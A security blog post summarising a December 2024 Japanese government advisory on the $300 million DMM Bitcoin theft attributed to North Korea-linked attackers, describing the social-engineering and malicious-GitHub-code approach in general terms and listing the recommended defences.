FSA Advisory: DMM Crypto Asset Heist
Founder and CEO
On December 24, 2024, Japanese authorities — the Financial Services Agency, National Police Agency, and NISC — issued an advisory regarding a crypto asset heist of over $300 million at DMM Bitcoin. The attack was carried out by threat actors linked to North Korea. The advisory details how the attackers combined social engineering with technical exploitation to carry out the theft.
This blog post highlights key findings from the advisory, focusing on the attack methods and defensive measures recommended by the authorities.
Attack Methodology
The attackers employed a multi-stage approach that began with social engineering. Targets included individuals working in businesses related to crypto assets, both within and outside Japan. The attackers initiated contact by impersonating corporate executives and others on social media. Targets were approached using messages tailored to their professional background, for instance, asking software engineers for programming help or mentorship.
The attackers would often request moving conversations to different social media platforms or messaging apps. The advisory noted this was likely to take advantage of services where sent messages could be deleted from the target's chat history.
Malware Deployment
One specific method involved attackers committing code to GitHub, claiming it contained bugs that required investigation. The code, disguised as a simple API client program, would be shared with targets under the pretense of needing help. The program was designed to communicate with both legitimate servers and malicious ones controlled by the attackers. The response handling functions likely contained hidden executable code, designed to deploy malware upon execution.
Credential Theft
After infecting target computers, attackers sought authentication credentials and session cookies stored on these machines. Using these stolen credentials, they could impersonate legitimate users to access crypto asset management and blockchain-related systems. The advisory noted that both corporate and personal crypto assets were potential targets.
Defensive Measures
The advisory outlines a comprehensive defense strategy that addresses both human awareness and system security. On the human side, employees are encouraged to be particularly vigilant when approached through social media. A simple but effective recommendation is to request video calls to verify the identity of unknown contacts. The advisory also emphasizes the importance of documenting suspicious approaches by taking screenshots of the interaction.
Organizations are urged to implement multi-factor authentication and adopt the principle of least privilege, ensuring permissions are both limited in scope and time-boxed to their operational necessity. Systems should be monitored for unusual activities, including access from unexpected locations, devices, or times, and any log discrepancies. Former employee accounts should be promptly disabled to prevent unauthorized access, with mechanisms in place to detect and respond to any login attempts.
The advisory details specific guidance around code review and execution. When dealing with unfamiliar code, employees should use virtual machines for testing rather than executing code directly on their systems. Any shared code should be opened in a text editor with word wrap enabled for proper inspection, particularly code obfuscation. Employees are warned to exercise caution when pressured to review or execute unfamiliar code.
Centrally store logs to safeguard against malware tampering and ensure effective anomaly detection. Use Endpoint Detection and Response (EDR) to monitor for discrepancies between logs and actual system activity. Using dummy credentials in browsers can also help detect unauthorized access attempts.
Incident Response
If malware infection is suspected, the compromised machine should be immediately isolated from the corporate network while remaining powered on to preserve volatile data, such as memory dumps, for forensic analysis.
Looking Ahead
The crypto asset heist from DMM Bitcoin highlights how threat actors are running sophisticated campaigns targeting financial and technology companies. While technical security measures are important, the FSA advisory highlights how attackers are focusing on human targets, especially technical staff with access to critical systems. These threat actors combine social engineering and technical exploitation to breach systems through individual employees, including vendors.
Organizations and individuals are urged to remain vigilant and promptly report any suspicious communications to relevant government agencies, police, NISC, and cybersecurity-related organizations.
The joint advisory from Japanese authorities outlines key attack patterns and defensive measures in response to North Korea's ongoing cyber operations, reinforcing the importance of protecting against both social engineering and technical threats.